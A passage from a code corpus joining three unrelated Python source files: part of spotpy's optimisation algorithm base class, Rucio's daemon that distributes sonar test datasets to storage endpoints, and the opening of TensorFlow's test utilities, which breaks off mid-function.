self.all_params = param_info['random']
self.constant_positions = parameter.get_constant_indices(spot_setup)
if self.constant_positions:
self.non_constant_positions = []
for i, val in enumerate(self.all_params):
if self.all_params[i] not in self.constant_positions:
self.non_constant_positions.append(i)
else:
self.non_constant_positions = np.arange(0,len(self.all_params))
self.parameter = self.get_parameters
self.parnames = param_info['name']
self.algorithm_name = algorithm_name
# Create a type to hold the parameter values using a namedtuple
self.partype = parameter.ParameterSet(param_info)
self.evaluation = self.setup.evaluation()
self.save_sim = save_sim
self.optimization_direction = optimization_direction
self.dbname = dbname or 'customDb'
self.dbformat = dbformat or 'ram'
self.db_precision = db_precision
self.breakpoint = breakpoint
self.backup_every_rep = backup_every_rep
# Two parameters to control the data base handling
# 'dbinit' triggers the initial creation of the data base file
# 'dbappend' used to append to the existing data base, after restart
self.dbinit = dbinit
self.dbappend = dbappend
# Set the random state
if random_state is None: #ToDo: Have to discuss if these 3 lines are neccessary.
random_state = np.random.randint(low=0, high=2**30)
np.random.seed(random_state)
# If value is not None a timeout will set so that the simulation will break after sim_timeout seconds without return a value
self.sim_timeout = sim_timeout
self.save_threshold = save_threshold
if breakpoint == 'read' or breakpoint == 'readandwrite':
print('Reading backupfile')
try:
open(self.dbname+'.break')
except FileNotFoundError:
print('Backupfile not found')
self.dbappend = True
# Now a repeater (ForEach-object) is loaded
# A repeater is a convinent wrapper to repeat tasks
# We have the same interface for sequential and for parallel tasks
if parallel == 'seq':
from spotpy.parallel.sequential import ForEach
elif parallel == 'mpi':
from spotpy.parallel.mpi import ForEach
# MPC is based on pathos mutiprocessing and uses ordered map, so results are given back in the order
# as the parameters are
elif parallel == 'mpc':
from spotpy.parallel.mproc import ForEach
# UMPC is based on pathos mutiprocessing and uses unordered map, so results are given back in the order
# as the subprocesses are finished which may speed up the whole simulation process but is not recommended if
# objective functions do their calculation based on the order of the data because the order of the result is chaotic
# and randomized
elif parallel == 'umpc':
from spotpy.parallel.umproc import ForEach
else:
raise ValueError(
"'%s' is not a valid keyword for parallel processing" % parallel)
# This is the repeater for the model runs. The simulate method does the work
# If you need different tasks, the repeater can be pushed into a "phase" using the
# setphase function. The simulate method can check the current phase and dispatch work
# to other functions. This is introduced for sceua to differentiate between burn in and
# the normal work on the chains
self.repeat = ForEach(self.simulate)
# method "save" needs to know whether objective function result is list or float, default is float
self.like_struct_typ = type(1.1)
def __str__(self):
return '{type}({mtype}())->{dbname}'.format(
type=type(self).__name__,
mtype=type(self.setup).__name__,
dbname=self.dbname)
def __repr__(self):
return '{type}()'.format(type=type(self).__name__)
def get_parameters(self):
"""
Returns the parameter array from the setup
"""
pars = parameter.get_parameters_array(self.setup)
return pars[self.non_constant_positions]
def set_repetiton(self, repetitions):
self.status = _RunStatistic(repetitions, self.algorithm_name,
self.optimization_direction, self.parnames)
# In MPI, this command will do nothing on the master process
# but the worker processes are going to wait for jobs.
# Hence the workers will only receive parameters for the
# simulate function, new calculation phases and the termination
self.repeat.start()
def final_call(self):
self.repeat.terminate()
try:
self.datawriter.finalize()
except AttributeError: # Happens if no database was assigned
pass
self.status.print_status_final()
def _init_database(self, like, randompar, simulations):
if self.dbinit:
print('Initialize database...')
self.datawriter = database.get_datawriter(self.dbformat,
self.dbname, self.parnames, like, randompar, simulations,
save_sim=self.save_sim, dbappend=self.dbappend,
dbinit=self.dbinit, db_precision=self.db_precision,
setup=self.setup)
self.dbinit = False
def __is_list_type(self, data):
if type(data) == type:
return data == list or data == type(np.array([]))
else:
return type(data) == list or type(data) == type(np.array([]))
def save(self, like, randompar, simulations, chains=1):
# Initialize the database if no run was performed so far
self._init_database(like, randompar, simulations)
if self.__is_list_type(self.like_struct_typ) and self.__is_list_type(self.save_threshold):
if all(i > j for i, j in zip(like, self.save_threshold)): #Compares list/list
self.datawriter.save(like, randompar, simulations, chains=chains)
if not self.__is_list_type(self.like_struct_typ) and not self.__is_list_type(self.save_threshold):
if like>self.save_threshold: #Compares float/float
self.datawriter.save(like, randompar, simulations, chains=chains)
if self.__is_list_type(self.like_struct_typ) and not self.__is_list_type(self.save_threshold):
if like[0]>self.save_threshold: #Compares list/float
self.datawriter.save(like, randompar, simulations, chains=chains)
if not self.__is_list_type(self.like_struct_typ) and self.__is_list_type(self.save_threshold): #Compares float/list
if (like > self.save_threshold).all:
self.datawriter.save(like, randompar, simulations, chains=chains)
def read_breakdata(self, dbname):
''' Read data from a pickle file if a breakpoint is set.
Reason: In case of incomplete optimizations, old data can be restored. '''
import pickle
with open(dbname+'.break', 'rb') as breakfile:
work,backuptime,repos,obmin,obmax=pickle.load(breakfile)
self.status.starttime=self.status.starttime-backuptime
self.status.rep=repos
self.status.objectivefunction_min=obmin
self.status.objectivefunction_max=obmax
return work
def write_breakdata(self, dbname, work):
''' Write data to a pickle file if a breakpoint has been set.'''
import pickle
work=(work,self.status.last_print-self.status.starttime,self.status.rep,self.status.objectivefunction_min,self.status.objectivefunction_max)
with open(str(dbname)+'.break', 'wb') as breakfile:
pickle.dump(work, breakfile)
def getdata(self):
return self.datawriter.getdata()
def update_params(self, params):
#Add potential Constant parameters
self.all_params[self.non_constant_positions] = params
return self.all_params
def postprocessing(self, rep, params, simulation, chains=1, save_run=True, negativlike=False, block_print=False): # TODO: rep not necessaray
params = self.update_params(params)
if negativlike is True:
like = -self.getfitness(simulation=simulation, params=params)
else:
like = self.getfitness(simulation=simulation, params=params)
# Save everything in the database, if save is True
# This is needed as some algorithms just want to know the fitness,
# before they actually save the run in a database (e.g. sce-ua)
self.status(like,params,block_print=block_print)
if save_run is True and simulation is not None:
self.save(like, params, simulations=simulation, chains=chains)
if type(like)==type([]):
return like[0]
else:
return like
def getfitness(self, simulation, params):
"""
Calls the user defined spot_setup objectivefunction
"""
try:
#print('Using parameters in fitness function')
return self.setup.objectivefunction(evaluation=self.evaluation, simulation=simulation, params = (params,self.parnames))
except TypeError: # Happens if the user does not allow to pass parameter in the spot_setup.objectivefunction
#print('Not using parameters in fitness function')
return self.setup.objectivefunction(evaluation=self.evaluation, simulation=simulation)
def simulate(self, id_params_tuple):
"""This is a simple wrapper of the model, returning the result together with
the run id and the parameters. This is needed, because some parallel things
can mix up the ordering of runs
"""
id, params = id_params_tuple
self.all_params[self.non_constant_positions] = params #TODO: List parameters are not updated if not accepted for the algorithm, we may have to warn/error if list is given
all_params = self.all_params
# we need a layer to fetch returned data from a threaded process into a queue.
def model_layer(q,all_params):
# Call self.model with a namedtuple instead of another sequence
q.put(self.setup.simulation(self.partype(*all_params)))
# starting a queue, where in python2.7 this is a multiprocessing class and can cause errors because of
# incompability which the main thread. Therefore only for older Python version a workaround follows
que = Queue()
sim_thread = threading.Thread(target=model_layer, args=(que, all_params))
sim_thread.daemon = True
sim_thread.start()
# If self.sim_timeout is not None the self.model will break after self.sim_timeout seconds otherwise is runs as
# long it needs to run
sim_thread.join(self.sim_timeout)
# If no result from the thread is given, i.e. the thread was killed from the watcher the default result is
# '[nan]' and will not be saved. Otherwise get the result from the thread
model_result = None
if not que.empty():
model_result = que.get()
return id, params, model_result
|
distribution_daemon.py
|
# -*- coding: utf-8 -*-
# Copyright 2017-2021 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Vitjan Zavrtanik <vitjan.zavrtanik@cern.ch>, 2017
# - Vincent Garonne <vgaronne@gmail.com>, 2017-2018
# - Mario Lassnig <mario.lassnig@cern.ch>, 2018
# - Eric Vaandering <ewv@fnal.gov>, 2020
# - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020-2021
# - Thomas Beermann <thomas.beermann@cern.ch>, 2021
"""
Daemon for distributing sonar test files to available RSE's
"""
import glob
import logging
import os
import subprocess
import threading
import time
import rucio.db.sqla.util
from rucio.client.client import Client
from rucio.common import exception
from rucio.common.config import config_get
from rucio.common.exception import DuplicateRule, InsufficientAccountLimit, RSEBlacklisted, RSEWriteBlocked, ReplicationRuleCreationTemporaryFailed
from rucio.common.logging import setup_logging
GRACEFUL_STOP = threading.Event()
def rename_files(tdir, pattern, new_name):
"""
Renames the files in the dataset according to the RSE
on which the dataset is being replicated.
"""
for cnt, file_name in enumerate(glob.iglob(os.path.join(tdir, pattern))):
logging.info(file_name)
logging.info(new_name + str(cnt) + '.rnd')
if not os.path.isfile(os.path.join(tdir, new_name + str(cnt) + '.rnd')):
logging.info("renaming..")
os.rename(file_name, os.path.join(tdir, new_name + str(cnt) + '.rnd'))
def distribute_files(client, data_dir='small_sonar_dataset', dataset_prefix='sonar.test.small.', scope='user.vzavrtan', num_files=1):
"""
Check whether the RSE's already containt their respective sonar test dataset
and distributes the dataset to the ones that do not. Also checks whether the
RSE's are available for distribution.
param: data_dir - path to the folder which contains the dataset
param: dataset_prefix - the prefix of the dataset ex. sonar.test.small.AGLT2_SCRATCHDISK = prefix.RSE
param: num_files - number of files in the dataset
"""
logging.info("Running disribution iteration")
# remove the "if '_SCRATCHDISK'" for use on other RSE's
endpoint_names = [x['rse'] for x in client.list_rses() if '_SCRATCHDISK' in x['rse'] and x['availability'] == 7]
ready = []
rules = client.list_account_rules(account='vzavrtan')
for rule in rules:
if dataset_prefix in rule['name'] and rule['rse_expression'] in rule['name'] and rule['state'] == 'OK' and rule['locks_ok_cnt'] == num_files:
ready.append(rule['rse_expression'])
ready = list(set(ready))
for site in endpoint_names:
if GRACEFUL_STOP.is_set():
break
if site not in ready:
rename_files(data_dir, '*.rnd', dataset_prefix + site + '.file')
msg = "Uploading to %s " % (site)
logging.info(msg)
process = subprocess.Popen(['rucio', 'upload', data_dir, '--rse', site], stdout=subprocess.PIPE)
process.communicate()
msg = "Adding dataset %s " % (dataset_prefix + site)
logging.info(msg)
try:
client.add_dataset('user.vzavrtan', dataset_prefix + site)
except Exception as exception:
logging.warning("Error adding dataset: " + str(exception))
for file_name in glob.iglob(os.path.join(data_dir, '*.rnd')):
logging.info('Attaching to dataset:' + dataset_prefix + site + ' ' + scope + ':' + os.path.basename(file_name))
try:
client.attach_dids(scope, dataset_prefix + site, [{'scope': scope, 'name': os.path.basename(file_name)}])
except Exception as exception:
logging.warning('Error attaching dids: ' + str(exception))
logging.info('Adding rule for dataset')
try:
client.add_replication_rule([{'scope': scope, 'name': dataset_prefix + site}], 1, site)
except (DuplicateRule, RSEBlacklisted, RSEWriteBlocked, ReplicationRuleCreationTemporaryFailed,
InsufficientAccountLimit) as exception:
msg = 'Error adding replication rule: %s' % (str(exception))
logging.warning(msg)
else:
msg = "%s is already replicated." % (site)
logging.info(msg)
def run_distribution():
"""
Every x hours tries to distribute the datasets to RSE's that are
missing them.
"""
client = Client()
counter = 0
dataset_dir = config_get('sonar', 'dataset_dir')
dataset_prefix = config_get('sonar', 'dataset_prefix')
scope = config_get('sonar', 'scope')
num_files = 10
while not GRACEFUL_STOP.is_set():
if counter % 12 == 0:
distribute_files(client, data_dir=dataset_dir, dataset_prefix=dataset_prefix, scope=scope, num_files=num_files)
time.sleep(3600)
counter += 1
def run():
"""
Runs the distribution daemon
"""
setup_logging()
if rucio.db.sqla.util.is_old_db():
raise exception.DatabaseException('Database was not updated, daemon won\'t start')
thread = threading.Thread(target=run_distribution, kwargs={})
thread.start()
while thread and thread.is_alive():
thread.join(timeout=3.14)
def stop(signum=None, frame=None):
"""
Stops the distribution daemon
"""
log_msg = 'Stopping distribution daemon: %s %s' % (signum, frame)
logging.info(log_msg)
GRACEFUL_STOP.set()
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import gc
import math
import random
import re
import tempfile
import threading
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import tape
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import nest
from tensorflow.python.util.protobuf import compare
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
def assert_equal_graph_def(actual, expected, checkpoint_v2=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for actual, got %s" %
type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for expected, got %s" %
type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(len(a_value.bytes_list.value),
len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(
a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
def CudaSupportsHalfMatMulAndConv():
return pywrap_tensorflow.CudaSupportsHalfMatMulAndConv()
def InstallStackTraceHandler():
pywrap_tensorflow.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {
4: [0, 3, 1, 2],
5: [0, 4, 1, 2, 3]
}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {
4: [0, 2, 3, 1],
5: [0, 2, 3, 4, 1]
}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
# TODO(skyewm): remove this eventually
# pylint: disable=protected-access
def _use_c_api_wrapper(fn, use_c_api, *args, **kwargs):
prev_value = ops._USE_C_API
ops._USE_C_API = use_c_api
try:
with ops.Graph().as_default():
fn(*args, **kwargs)
finally:
ops._USE_C_API = prev_value
# pylint: disable=protected-access
def c_api_and_cuda_enabled():
return ops._USE_C_API and IsGoogleCudaEnabled()
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
fn(*args, **kwargs)
return wrapper
return real_skip_if
# TODO(skyewm): remove this eventually
def disable_c_api(fn):
"""Decorator for disabling the C API on a test.
Note this disables the C API after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
_use_c_api_wrapper(fn, False, *args, **kwargs)
return wrapper
# TODO(skyewm): remove this eventually
def enable_c_api(fn):
"""Decorator for enabling the C API on a test.
Note this enables the C API after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
_use_c_api_wrapper(fn, True, *args, **kwargs)
return wrapper
# This decorator is a hacky way to run all the test methods in a decorated
# class with and without C API enabled.
# TODO(iga): Remove this and its uses once we switch to using C API by default.
def with_c_api(cls):
"""Adds methods that call original methods but with C API enabled.
Note this enables the C API in new methods after running the test class's
setup method. This can be a problem if some objects are created in it
before the C API is enabled.
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
for name, value in cls.__dict__.copy().items():
if callable(value) and name.startswith("test"):
setattr(cls, name + "WithCApi", enable_c_api(value))
return cls
class IsolateTest(object):
"""A context manager which isolates resources in its block.
Provides an Eager-agnostic abstraction for preventing the sharing of
variables and other resources.
In graph mode, resource handle ops are only executed in a particular Session,
isolating them from resources with the same name in other Graphs. In Eager,
separate Sessions do not exist, so resources (particularly ResourceVariables)
would be shared implicitly if a resource of the same name were created
anywhere in a Python process. Multiple handles to the same resource would
cause several issues, and so this type of sharing will raise an exception.
Using resources with the same name in a single Python process may be useful
(especially for unit tests), so this context manager provides an abstraction
for isolating resources. Using a resource created in one Isolation environment
in another is an error.
Example usage in Eager mode:
```python
import tensorflow as tf
# Import subject to change
from tensorflow.contrib.eager.python import tfe
tfe.enable_eager_execution()
for hyperparameter in [1, 2, 3]:
with tfe.IsolateTest():
v = tfe.Variable(name="v", initial_value=hyperparameter)
# train model, test results ...
```
IsolateTest is currently exposed through contrib.eager, but it creates a new
default Graph and provides equivalent safety in graph mode.
"""
def __init__(self):
if context.in_eager_mode() and tape.could_possibly_record():
raise ValueError("Cannot isolate Eager execution with an active tape.")
# In Eager, Graphs set a container which isolates resources, and maintain a
# VariableStore which caches ResourceVariable objects created through
# get_variable. So setting the default Graph has the side effect of
# isolating Eager resources.
with context.eager_mode():
# Create the graph in Eager mode, as this provides stricter semantics
# (i.e. has a unique container prefix). This prevents implicit sharing
# when a Graph-mode graph is created and then Eager mode is enabled (an
# error through enable_eager_execution, but common with context managers
# in unit tests).
self._graph_as_default_context_manager = ops.Graph().as_default()
def __enter__(self):
self._graph_as_default_context_manager.__enter__()
def __exit__(self, type_arg, value_arg, traceback_arg):
return self._graph_as_default_context_manager.__exit__(
type_arg, value_arg, traceback_arg)
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensor(obj):
try:
return (isinstance(obj, ops.Tensor) or
isinstance(obj, variables.Variable))
except ReferenceError:
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(id(obj) for obj in gc.get_objects() if _is_tensor(obj))
outside_container_prefix = ops.get_default_graph()._container_prefix
with IsolateTest():
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the container prefix so that we can print the values
# of variables which get leaked when executing eagerly.
ops.get_default_graph()._container_prefix = outside_container_prefix
f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
backprop._last_zero = [None]
backprop._shape_dtype = [None, None]
context.get_default_context().scalar_cache().clear()
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensor(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return decorator
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
f(self, **kwargs)
gc.collect()
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, len(gc.garbage))
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return decorator
def run_in_graph_and_eager_modes(
__unused__=None, graph=None, config=None,
use_gpu=False, force_gpu=False,
reset_test=True, assert_no_eager_garbage=False):
"""Runs the test in both graph and eager modes.
Args:
__unused__: Prevents sliently skipping tests.
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
reset_test: If True, tearDown and SetUp the test case again.
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test in eager mode. This will fail if there are reference cycles
(e.g. a = []; a.append(a)). Off by default because some tests may create
garbage for legitimate reasons (e.g. they define a class which inherits
from `object`), and because DEBUG_SAVEALL is sticky in some Python
interpreters (meaning that tests which rely on objects being collected
elsewhere in the unit test file will not work). Additionally, checks that
nothing still has a reference to Tensors that the test allocated.
Returns:
Returns a decorator that will run the decorated test function
using both a graph and using eager execution.
"""
assert not __unused__, "Add () after run_in_graph_and_eager_modes."
def decorator(f):
"""Test method decorator."""
def decorated(self, **kwargs):
"""Decorated the test method."""
with context.graph_mode():
with self.test_session(graph, config, use_gpu, force_gpu):
f(self, **kwargs)
if reset_test:
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self.setUp()
def run_eager_mode(self, **kwargs):
if force_gpu:
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with context.device(gpu_name):
f(self)
elif use_gpu:
# TODO(xpan): Support softplacement and gpu by default when available.
f(self, **kwargs)
else:
with context.device("/device:CPU:0"):
f(self, **kwargs)
if assert_no_eager_garbage:
run_eager_mode = assert_no_new_tensors(
assert_no_garbage_created(run_eager_mode))
with context.eager_mode():
with IsolateTest():
run_eager_mode(self, **kwargs)
return decorated
return decorator
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Args:
cuda_only: limit the search to CUDA gpus.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Returns:
True iff a gpu device of the requested kind is available.
"""
def compute_capability_from_device_desc(device_desc):
# TODO(jingyue): The device description generator has to be in sync with
# this file. Another option is to put compute capability in
# DeviceAttributes, but I avoided that to keep DeviceAttributes
# target-independent. Reconsider this option when we have more things like
# this to keep in sync.
# LINT.IfChange
match = re.search(r"compute capability: (\d+)\.(\d+)", device_desc)
# LINT.ThenChange(//tensorflow/core/\
# common_runtime/gpu/gpu_device.cc)
if not match:
return 0, 0
return int(match.group(1)), int(match.group(2))
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
if (min_cuda_compute_capability is None or
compute_capability_from_device_desc(local_device.physical_device_desc)
>= min_cuda_compute_capability):
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow.
"""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
